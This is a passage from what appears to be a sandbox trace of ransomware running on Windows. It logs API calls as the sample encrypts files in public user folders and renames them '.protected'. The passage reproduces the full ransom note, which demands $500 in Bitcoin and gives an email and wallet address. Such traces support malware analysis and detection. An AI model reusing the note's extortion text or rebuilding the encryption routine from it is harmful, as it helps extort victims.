party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.487] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.488] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.488] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.488] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.488] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0095.488] CloseHandle (hObject=0xa4) returned 1 [0095.488] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.488] lstrcmpiW (lpString1="Libraries", lpString2="Windows") returned -1 [0095.488] lstrcmpiW (lpString1="Libraries", lpString2="Program Files") returned -1 [0095.488] lstrcmpiW (lpString1="Libraries", lpString2="Program Files (x86)") returned -1 [0095.488] lstrcmpiW (lpString1="Libraries", lpString2="$Recycle.bin") returned 1 [0095.488] lstrcmpiW (lpString1="Libraries", lpString2="System Volume Information") returned -1 [0095.488] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries") returned 29 [0095.488] lstrcmpW (lpString1="Libraries", lpString2=".") returned 1 [0095.488] lstrcmpW (lpString1="Libraries", lpString2="..") returned 1 [0095.489] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\*") returned 31 [0095.489] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.489] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.489] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.489] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.489] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.489] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.489] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\.") returned 31 [0095.489] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.489] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.489] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.489] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.489] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\." (normalized: "c:\\users\\public\\libraries\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.490] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.490] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.490] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.490] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.490] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.490] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.490] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\..") returned 32 [0095.490] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.490] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.490] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.490] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.490] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.490] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\.." (normalized: "c:\\users\\public"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.490] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.490] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.490] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.490] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.490] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.490] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.490] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini") returned 41 [0095.490] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.490] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.490] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.490] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini" (normalized: "c:\\users\\public\\libraries\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.491] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini") returned 41 [0095.491] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.491] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini") returned 41 [0095.491] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.491] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini") returned 41 [0095.491] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.491] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x58, lpOverlapped=0x0) returned 1 [0095.492] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffffa8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.492] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x58, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x58, lpOverlapped=0x0) returned 1 [0095.492] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.492] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.492] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.492] CloseHandle (hObject=0xb4) returned 1 [0095.492] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini.protected") returned 51 [0095.492] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini" (normalized: "c:\\users\\public\\libraries\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini.protected" (normalized: "c:\\users\\public\\libraries\\desktop.ini.protected")) returned 1 [0095.493] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.493] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="Windows") returned -1 [0095.493] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="Program Files") returned 1 [0095.493] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="Program Files (x86)") returned 1 [0095.493] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="$Recycle.bin") returned 1 [0095.493] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="System Volume Information") returned -1 [0095.493] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 51 [0095.493] StrStrIW (lpFirst="RecordedTV.library-ms", lpSrch=".protected") returned 0x0 [0095.493] lstrcmpW (lpString1="RecordedTV.library-ms", lpString2="RESTORE_FILES.txt") returned -1 [0095.493] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.493] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.493] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.493] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 51 [0095.493] StrStrW (lpFirst="RecordedTV.library-ms", lpSrch=".txt") returned 0x0 [0095.493] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 51 [0095.493] StrStrW (lpFirst="RecordedTV.library-ms", lpSrch=".rar") returned 0x0 [0095.493] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 51 [0095.494] StrStrW (lpFirst="RecordedTV.library-ms", lpSrch=".zip") returned 0x0 [0095.494] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x36c, lpOverlapped=0x0) returned 1 [0095.557] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffc94, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.557] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x36c, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x36c, lpOverlapped=0x0) returned 1 [0095.557] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.557] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.563] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.564] CloseHandle (hObject=0xb4) returned 1 [0095.564] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.protected") returned 61 [0095.564] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.protected" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.protected")) returned 1 [0095.564] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.565] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.565] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\RESTORE_FILES.txt") returned 47 [0095.565] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RESTORE_FILES.txt" (normalized: "c:\\users\\public\\libraries\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.576] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.576] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.577] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.577] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.577] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.577] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0095.577] CloseHandle (hObject=0xa4) returned 1 [0095.577] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.577] lstrcmpiW (lpString1="Music", lpString2="Windows") returned -1 [0095.578] lstrcmpiW (lpString1="Music", lpString2="Program Files") returned -1 [0095.578] lstrcmpiW (lpString1="Music", lpString2="Program Files (x86)") returned -1 [0095.578] lstrcmpiW (lpString1="Music", lpString2="$Recycle.bin") returned 1 [0095.578] lstrcmpiW (lpString1="Music", lpString2="System Volume Information") returned -1 [0095.578] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music") returned 25 [0095.578] lstrcmpW (lpString1="Music", lpString2=".") returned 1 [0095.578] lstrcmpW (lpString1="Music", lpString2="..") returned 1 [0095.578] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\*") returned 27 [0095.578] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Music\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.578] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.578] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.578] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.578] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.578] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.578] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\.") returned 27 [0095.578] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.578] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.578] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.578] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.578] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.578] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\." (normalized: "c:\\users\\public\\music\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.578] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.578] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.578] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.578] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.578] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.578] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.578] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\..") returned 28 [0095.579] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.579] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.579] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.579] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.579] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.579] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.579] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\.." (normalized: "c:\\users\\public"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.579] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.579] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.579] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.579] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.579] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.579] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.579] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini") returned 37 [0095.579] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.579] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.579] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.579] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.579] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.580] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini") returned 37 [0095.580] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.580] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini") returned 37 [0095.580] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.580] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini") returned 37 [0095.580] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.580] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x17c, lpOverlapped=0x0) returned 1 [0095.580] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe84, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.580] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x17c, lpOverlapped=0x0) returned 1 [0095.580] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.580] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.580] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.581] CloseHandle (hObject=0xb4) returned 1 [0095.582] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini.protected") returned 47 [0095.582] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\desktop.ini"), 